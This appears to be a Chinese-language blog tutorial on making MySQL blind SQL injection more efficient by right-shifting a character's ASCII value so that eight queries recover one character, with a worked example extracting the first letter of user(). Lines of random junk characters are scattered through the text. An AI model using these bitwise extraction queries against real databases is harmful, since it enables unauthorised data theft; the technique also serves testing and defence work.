关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
# K/ o% v( f" t9 S: e4 L- x


, V$ K$ U+ ~' Q# Q" j下面将以查询mysql数据库当中user()的第一位为例:

% u9 K4 ]$ P& V% F2 b

: F% W7 ?! j' y8 n; Aps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
3 u' g$ Z# L, y- W! Z# g& E
2 R0 g3 ~( ~; M& k

/ z7 |7 H8 F2 M0 X: s首先执行如下sql语句:
, `$ G. s. N( z6 Y, c3 e$ O) G* H$ p

% f9 O$ F; @' i
+ C& s5 I* F1 E+ L; j; K6 a( Xmysql> select (ascii((substr(user(),1,1))) >> 7)=0;
( p6 S4 ~0 b( v. n% M, L

4 U$ {2 ~9 }3 [
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

! B: o! ^- x5 }. ]$ W! E
) D$ E: @& l0 P
第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1

/ A" Q+ r; m# B# z& ~& x7 v$ X

如果运算结果为1,说明第一位为0,不为1
' o2 a! A& d  y" ]

8 D$ u+ p; l) J2 L
+————————————–+
* [1 D8 Z% C* Q: j" Q
| (ascii((substr(user(),1,1))) >> 7)=0 |
: J  Q. F% P# O% \
0 O! b8 R6 `3 j. v. r+————————————–+

| 1 |
, c% @$ k8 I' ^9 x
+ p# f( P2 g- X& F. p& K. I+————————————–+
7 e% T- b% ^8 F' ?* H7 w
. a$ g5 [. y8 b+ b5 `0 s# C1 row in set (0.00 sec)

这样我们就确定这个8bit的ascii的第一位为0


9 V0 x( N+ Q+ l* q$ _1 k
第二次我们来做6次右偏移来确定前两位
- G1 w, |2 X, E; w. a0 |0 i

7 P& `, X# c  w/ `5 S* n* v3 M
6 y7 m1 D/ C4 I3 x4 v7 I+ Q; d前两位可能是01或00,即依然可以与0做比较,
5 u/ Q* O, S/ m* M
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
- O) @. H- I9 A& ^6 K0 i
1 N* y4 X3 E5 G% u1 d4 s+————————————–+
. J; m( P+ ]9 }4 T  j
$ X$ {9 v% A2 m" u# K: g| (ascii((substr(user(),1,1))) >> 6)=0 |
0 u$ J4 ~) u+ n
0 W0 ^, w# |. l- {& q+————————————–+

3 E0 {( q% Y- `0 E" \* z| 0 |
% K( R5 l) O# k7 ~
+————————————–+

5 r- V3 B2 v, `3 @1 {9 G1 row in set (0.00 sec)


2 y/ M, A0 F  F+ R- G. w# @2 g: a
结果为0,即第二位为1
( w" H0 S( S, u4 U* r2 f

8 v4 {6 X! Y2 o; R0 s$ ~
开始猜测前三位为010或011
, T- e: j( S# u- g0 i  t3 y+ C( v
9 V$ R0 Z, ?$ Z, Y

让我们看看010和011的ascii码是多少



8 x% a: M0 ?5 ?/ c/ f分别查询select b’011′ select b’010′



2 q& l% H& W- m7 i) t# `  `获得结果 010 = 2 011 = 3

# C' U& ^: D6 v& W! g  R! C
3 u5 u! a8 t% K( j
$ N4 Z# q5 A) y' A2 S0 t3 b! i执行如下sql:


& @% p; @- @1 {% n$ T" R8 g  F" a
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
  O( j5 ^, O' X3 `' p
+————————————–+
5 x3 ~. I$ }6 Q8 N
  x2 [2 e% N% N! f: M2 r| (ascii((substr(user(),1,1))) >> 5)=2 |

% D4 E; p3 G- V  X+————————————–+

| 0 |
4 d1 f3 W6 V; e# A% d
! V7 x1 ^6 F3 W' h* w+————————————–+
" r, I$ {! q6 J0 ]* l( q2 H0 b
* s& O+ z; i$ l* E8 W即前三位不为010,而是011



5 S3 o' Y0 @* m" n直到获得最后一位
  C" J" [% k# k  v+ j9 F& I& T. o
* |' X; I% R$ C. v

最终结果为:01110010
( j- b- S! [( h- y) l" k5 k9 q5 U4 s
7 n" t8 b+ s5 r2 `8 O: V

转换一下:
- R5 u+ K% [: C( r6 J

! _$ x  Y' H3 H8 ~3 \# N
' g0 P1 i- n& k/ g7 m3 D2 ?select b’01110010′

. |3 V2 g) w* ]: k2 r7 t; o

; k! J( l# N. D查询结果
8 V* k" @* Q5 J/ |% J" B5 E

0 C" F+ G& q9 {/ a' c% A* G
+————-+
0 Y! t9 E: P8 E0 |" x  x
( P( P/ U; ^3 w' d| b’01110010′ |
. h) o* {4 K2 Q% V0 d: @2 H+ M
+————-+

: E1 d2 g) P. {6 V0 }| r |
, u$ Y( w6 P" v
+————-+

1 row in set (0.00 sec)

; ?' u7 y* q( k# j8 R5 Q" \7 A
) Q0 Y9 ~2 G; h3 A
, O/ R7 R# l) q0 A这样我们就获得了user()的第一位.其它位依此类推